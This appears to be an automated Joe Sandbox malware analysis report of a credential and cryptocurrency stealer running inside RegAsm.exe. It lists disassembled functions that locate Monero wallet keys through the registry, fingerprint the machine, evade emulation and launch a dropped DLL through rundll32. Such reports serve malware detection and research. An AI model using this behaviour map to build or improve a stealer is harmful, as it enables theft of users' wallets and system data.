Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,004175EA), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E60: CreateThread.KERNEL32(00000000,00000000,00416D8F,?,00000000,00000000), ref: 00416EFF
Part of subcall function 00416E60: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F07

Strings

.keys, xrefs: 00401B0D
\Monero\wallet.keys, xrefs: 00401B2F

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: d3b2e6a516c7fffd5d3c5b216be02d4c1431b600bcb16b660a5902b4e9d0ee6c
Instruction ID: 69b81150e18d91f1f1e54b8cdea51100ef8117911954c29cb3d5610a51c1c03f
Opcode Fuzzy Hash: d3b2e6a516c7fffd5d3c5b216be02d4c1431b600bcb16b660a5902b4e9d0ee6c
Instruction Fuzzy Hash: FA5151B1E9012D9BCF11EB25DD466DC7379AF04308F5054BAB60873191DA78AFC98F98

Function 00415DC0 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E4F

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415E6C
lstrcatA.KERNEL32(?,?), ref: 00415E8B
lstrcatA.KERNEL32(?,?), ref: 00415E9F
lstrcatA.KERNEL32(?), ref: 00415EB2
lstrcatA.KERNEL32(?,?), ref: 00415EC6
lstrcatA.KERNEL32(?), ref: 00415ED9

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415AD4: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415AF9
Part of subcall function 00415AD4: HeapAlloc.KERNEL32(00000000), ref: 00415B00
Part of subcall function 00415AD4: wsprintfA.USER32 ref: 00415B19
Part of subcall function 00415AD4: FindFirstFileA.KERNEL32(?,?), ref: 00415B30
Part of subcall function 00415AD4: StrCmpCA.SHLWAPI(?,00436A90), ref: 00415B51
Part of subcall function 00415AD4: StrCmpCA.SHLWAPI(?,00436A94), ref: 00415B6B
Part of subcall function 00415AD4: wsprintfA.USER32 ref: 00415B92

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID:
API String ID: 1968765330-0
Opcode ID: dd9077d2ece8f0fa62e47e77babbbc2b8a1a962058fa4acaeb397200ae06d387
Instruction ID: e94e5e549771f60c9880f302011d3a12e822f5a94e981cf4ded127be2f8bd2c2
Opcode Fuzzy Hash: dd9077d2ece8f0fa62e47e77babbbc2b8a1a962058fa4acaeb397200ae06d387
Instruction Fuzzy Hash: 4E512CB1A0011C9BCF54DB64CC85ADDB7B9BB4C315F4044EAF609E3250EA35ABC98F58

Function 00415638 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041566D
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 0041568D
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156B3
lstrcatA.KERNEL32(?,?), ref: 004156EE
lstrcatA.KERNEL32(?), ref: 00415701

Strings

yA, xrefs: 004157C7

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID: yA
API String ID: 3357907479-454502181
Opcode ID: 494fea68686eff91aff3f079c2517486a256e6cd59fad59ecf56d21876959426
Instruction ID: 605e856f38cca70513c2d65eec64d52423aa7d5069a1eccea3626d389ebe3aa6
Opcode Fuzzy Hash: 494fea68686eff91aff3f079c2517486a256e6cd59fad59ecf56d21876959426
Instruction Fuzzy Hash: 5141AE7184011D9FDF24EF60DC86AE8777ABB18309F1004AAF50AA31A1DE759FC59F54

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C
MachineGuid, xrefs: 00411640

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: cfe955c007fe244cd9e40eb48522d09ab7bd534578616772fc971eb02966dfdb
Instruction ID: 7b55e620f76560f8441474d4d828533cec33cdf81e9bd4d8fbff30fbf98a8e32
Opcode Fuzzy Hash: cfe955c007fe244cd9e40eb48522d09ab7bd534578616772fc971eb02966dfdb
Instruction Fuzzy Hash: B81161B594031DAFDB10DF50DC89EEBB7BCEB14309F0000E6A619E2052D6759F888F10

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 4f2045b7203c4bd81c1c5592cd170f4ee3ab197098c58cfc6bfda79131d70d0f
Instruction ID: 6a723b0bf30ba4ddc589307fb52e6805e2d9d1b98ac7b5fca3d522df86ed7434
Opcode Fuzzy Hash: 4f2045b7203c4bd81c1c5592cd170f4ee3ab197098c58cfc6bfda79131d70d0f
Instruction Fuzzy Hash: 97F05475780304FFFF148B91DC0AFAE7A7DDB44B1AF2410A5F601F51D0E6B65A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF58,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: ba825d6510256d8c6f00f1fb23df38d5c6cea4aa85adbbd132b5b9f946f2c1f7
Instruction ID: aa2e3685a72b09a3fb2dcb87204522bcdc6d732c81a7608aa5267b05385a158d
Opcode Fuzzy Hash: ba825d6510256d8c6f00f1fb23df38d5c6cea4aa85adbbd132b5b9f946f2c1f7
Instruction Fuzzy Hash: 59115E70A0424ADFCF019FA4DC999EEBBB6AF48300F54417EF215E72A1CB394945CB68

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00418495), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0cd85bc549366c6980d605ad034fc7e5578819b96bc3e246f75ebc10e016ef94
Instruction ID: de48042f61174206f28540501a56dab48ed1071ae206a1b474cffe0304ee8063
Opcode Fuzzy Hash: 0cd85bc549366c6980d605ad034fc7e5578819b96bc3e246f75ebc10e016ef94
Instruction Fuzzy Hash: AEF0C27238122077F22426763C6EFAB1A6C9B42F56F205035F708FB2D1D669980496BC

Function 0041292B Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00417065,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00417083,00436C10,00000000,004366C7,?,?,?,?,00418558), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366FB,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175B2,004366D6), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B4D

Strings

C:\ProgramData\, xrefs: 0041295E
.dll, xrefs: 004129B6
C:\Windows\system32\rundll32.exe, xrefs: 00412AAC
"" , xrefs: 004129FB

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: 6047c5b83342549980db005652ed89a7f88da1b6fb60af78e15224d582cbabee
Instruction ID: 9ae2cf2ae800b8bb33ad062817472c1473339d55641b58f4140958fd0a63e42d
Opcode Fuzzy Hash: 6047c5b83342549980db005652ed89a7f88da1b6fb60af78e15224d582cbabee
Instruction Fuzzy Hash: 7C71CD71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B71A1DBB86E8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436EC4,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00417044,004366C7,?,?,?,?,00418558), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: 40940802265a4c3fb3d17f66f3aebd6262146aecc76f5541b5b5cbee53a0a034
Instruction ID: 38687d82805313cec56707417503c3a8b15a6b782f41cbda205fc1cb98a2a4ce
Opcode Fuzzy Hash: 40940802265a4c3fb3d17f66f3aebd6262146aecc76f5541b5b5cbee53a0a034
Instruction Fuzzy Hash: D7118671A00118ABCB21EB65DD86FDD73B8AB08304F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436908,Display Resolution: ,004368EC,00000000,User Name: ,004368DC,00000000,Computer Name: ,004368C8,AV: ,004368BC,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2427181341.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2427181341.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 340342b6390d2646d15e4b4ae051aaa258ec2fff34d5e99288e24d8d28d8adba
Instruction ID: e7d6c9dceb0403f0db7cb32a278f6c02741a37abefeaae954b3d249c6c8c6462
Opcode Fuzzy Hash: 340342b6390d2646d15e4b4ae051aaa258ec2fff34d5e99288e24d8d28d8adba
Instruction Fuzzy Hash: 7C01A9B1B00218ABEB08DFB4DC45EEEB7B9EF04705F04006AF602D7290EA75DD818768

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436880,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B79
RegQueryValueExA.KERNEL32(00436880,00000000,00000000,00000000,000000FF,?,?,?,00413E5E,Windows: ,00436898), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000003.00000002.2427181341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

